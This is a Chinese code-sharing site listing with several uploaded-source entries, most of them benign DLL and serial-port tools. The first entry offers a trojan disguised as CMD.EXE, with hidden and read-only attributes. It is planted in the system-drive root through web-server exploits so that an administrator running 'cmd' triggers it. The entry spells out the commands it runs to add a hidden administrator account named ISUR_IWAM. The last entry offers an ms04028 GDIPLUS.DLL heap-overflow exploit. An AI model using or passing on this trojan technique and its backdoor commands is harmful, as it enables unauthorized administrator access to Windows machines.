你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.DLL等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
PowerBuild8原码,用于查找和替换任意PBL中的内容,不过需要PB8动态库libjcc.DLL pbapl80.DLL pbcmp80.DLL pbdev80.DLL pbdpp80.DLL pbdts80.DLL pbdwe80.DLL pbdwp80.DLL pbeas80.DLL pblib80.DLL pborc80.DLL pbscr80.DLL pbsql80.DLL pbsys80.DLL pbudo80.DLL pbvm80.DLL pbwed80.DLL的支持
标签: PowerBuild8
上传时间: 2015-01-13
上传用户:yan2267246
串口通信,写成DLL便于参阅
标签: 串口通信
上传时间: 2013-12-27
上传用户:从此走出阴霾
一个类似Smart Card PCSC协议,用于读写CPU卡的DLL源码
上传时间: 2013-12-18
上传用户:bjgaofei
计算机接口技术系列 Visual C++串口通信技术与工程实践 在编译本章程序后,请将winio.DLL、winio.vxd和winio.sys文件复制到可执行文件所在目录下, 否则WinIo库初始化函数initializeWinIO调用将会失败。
上传时间: 2013-12-15
上传用户:wlcaption
一个由cvcode.pas扩展的中文内码转换工具,内含有一个可供winword/excel的vba调用的DLL,全部含源代码。
上传时间: 2015-02-25
上传用户:1109003457
MR320数据采集程序,含VC,Delphi,VB,VFP原码及DLL.
上传时间: 2015-02-25
上传用户:youlongjian0
将一个m文件转成c /cpp文件并在VC中进行编译。这种方法有个烦人的地方,每次你都需要把matlab生成的一 大堆c和h文件考到vc中,比如我读入一副图片先做膨胀,再腐蚀,再进行小波变换,最后 显示。这样一个程序会生成大概150多个文件,每次都要拷贝这些文件很不方便。我试着用 了另外一种方法,可以简化这些工作。那就是不生成cpp文件交给VC去编译,而是直接在m atlab中生成一个DLL交给VC去链接即可。这样无论matlab生成多少文件,都只需要拷贝三 个文件即可。
上传时间: 2013-12-19
上传用户:aa17807091
cp210x非标波特率设置工具 CP210x Baud Rate Configuration Utility v1.0 Release Notes Copyright (C) 2004 Silicon Laboratories, Inc. This release contains the following components: * CP210xBaudRateAliasConfig.exe * CP210xManufacturing.DLL * CP210xBaudRateAliasConfig VC++ project * REL_NOTES.TXT (this file)
标签: 210x Configuration 210 Copyright
上传时间: 2014-01-24
上传用户:362279997
ms04028漏洞利用程序,利用GDIPLUS.DLL的堆溢出漏洞
上传时间: 2015-03-14
上传用户:qunquan